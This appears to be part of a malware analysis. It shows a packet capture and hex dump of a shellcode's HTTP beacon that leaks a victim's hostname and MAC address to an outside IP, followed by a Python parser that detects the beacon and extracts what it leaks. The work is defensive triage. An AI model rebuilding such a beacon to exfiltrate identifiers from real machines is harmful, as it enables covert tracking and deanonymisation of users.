13:55:52.432742 IP 192.168.0.20.1065 > 65.222.202.54.http: Flags [P.], seq 1:154, ack 1, win 65535, length 153
13:55:52.432760 IP 65.222.202.54.http > 192.168.0.20.1065: Flags [.], ack 154, win 15544, length 0
13:55:52.432880 IP 192.168.0.20.1065 > 65.222.202.54.http: Flags [F.], seq 154, ack 1, win 65535, length 0
13:55:52.433010 IP 65.222.202.54.http > 192.168.0.20.1065: Flags [F.], seq 1, ack 155, win 15544, length 0
13:55:52.433398 IP 192.168.0.20.1065 > 65.222.202.54.http: Flags [.], ack 2, win 65535, length 0

# sent HTTP data:

00000000  47 45 54 20 2f 30 35 63 65 61 34 64 65 2d 39 35  GET /05c ea4de-95
00000010  31 64 2d 34 30 33 37 2d 62 66 38 66 2d 66 36 39  1d-4037- bf8f-f69
00000020  30 35 35 62 32 37 39 62 62 20 48 54 54 50 2f 31  055b279b b HTTP/1
00000030  2e 31 0d 0a 48 6f 73 74 3a 20 39 32 31 37 30 32  .1..Host : 921702
00000040  0d 0a 43 6f 6f 6b 69 65 3a 20 49 44 3d 30 30 32  ..Cookie : ID=002
00000050  31 38 36 31 39 34 35 37 38 0d 0a 43 6f 6e 6e 65  18619457 8..Conne
00000060  63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76  ction: k eep-aliv
00000070  65 0d 0a 41 63 63 65 70 74 3a 20 2a 2f 2a 0d 0a  e..Accep t: */*..
00000080  41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 3a  Accept-E ncoding:
00000090  20 67 7a 69 70 0d 0a 0d 0a                        gzip... .

# sent MAC address data:

Source: 192.168.0.20:1065 -> 65.222.202.54:80

HTTP traffic header contains sensitive information 00XXXXXXXXXX (macaddr):
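# Added example (not from the MMD write-up): a parser for the fixed request template the
# shellcode builds, returning what the beacon leaks (hostname, MAC, path id) so the capture
# above can be triaged and an egress filter tested. SAMPLE_BEACON is reconstructed from the
# 153 bytes captured above; BENIGN_REQUEST is a constructed ordinary browser request.

```python
from __future__ import annotations
import re

SAMPLE_BEACON = (
    b"GET /05cea4de-951d-4037-bf8f-f69055b279bb HTTP/1.1\r\n"
    b"Host: 921702\r\n"
    b"Cookie: ID=002186194578\r\n"
    b"Connection: keep-alive\r\n"
    b"Accept: */*\r\n"
    b"Accept-Encoding: gzip\r\n"
    b"\r\n"
)

# constructed: a normal browser request, to show the matcher stays quiet on it
BENIGN_REQUEST = (
    b"GET /index.html HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Accept: */*\r\n"
    b"\r\n"
)

# the path is the UUID baked into the template at file offset 0x2f0
REQUEST_LINE = re.compile(
    rb"GET /([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}) HTTP/1\.1")
# 0x1e1-0x20b writes the 6 MAC bytes as 12 upper-case hex digits (0x30 / 0x37 + nibble)
COOKIE_ID = re.compile(rb"ID=([0-9A-F]{12})")
# header order and values are copied from the template, never negotiated; no User-Agent
EXPECTED_ORDER = [b"Host", b"Cookie", b"Connection", b"Accept", b"Accept-Encoding"]
EXPECTED_FIXED = {b"Connection": b"keep-alive", b"Accept": b"*/*", b"Accept-Encoding": b"gzip"}
HOSTNAME_CAP = 0x20  # `cmp edx, 0x20` at 0x15c: the hostname copy is clipped to 32 bytes


def parse_beacon(raw: bytes) -> dict[str, str] | None:
    """Return the leaked identifiers if `raw` is a Magneto beacon, else None."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep or body:                     # template ends in an empty line, no body
        return None
    lines = head.split(b"\r\n")
    request = REQUEST_LINE.fullmatch(lines[0])
    if request is None or len(lines) != 1 + len(EXPECTED_ORDER):
        return None
    headers = []
    for line in lines[1:]:
        name, colon, value = line.partition(b": ")
        if not colon:
            return None
        headers.append((name, value))
    if [n for n, _ in headers] != EXPECTED_ORDER:
        return None
    fields = dict(headers)
    if any(fields[n] != v for n, v in EXPECTED_FIXED.items()):
        return None
    cookie = COOKIE_ID.fullmatch(fields[b"Cookie"])
    if cookie is None or len(fields[b"Host"]) > HOSTNAME_CAP:
        return None
    mac_hex = cookie.group(1).decode("ascii")
    return {
        "path_id": request.group(1).decode("ascii"),
        "hostname": fields[b"Host"].decode("ascii", "replace"),
        "mac": ":".join(mac_hex[i:i + 2] for i in range(0, 12, 2)),
    }


if __name__ == "__main__":
    print(parse_beacon(SAMPLE_BEACON))   # the capture above: hostname 921702, MAC 00:21:86:19:45:78
    print(parse_beacon(BENIGN_REQUEST))  # None
```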

- check mate -

----

Investigated by: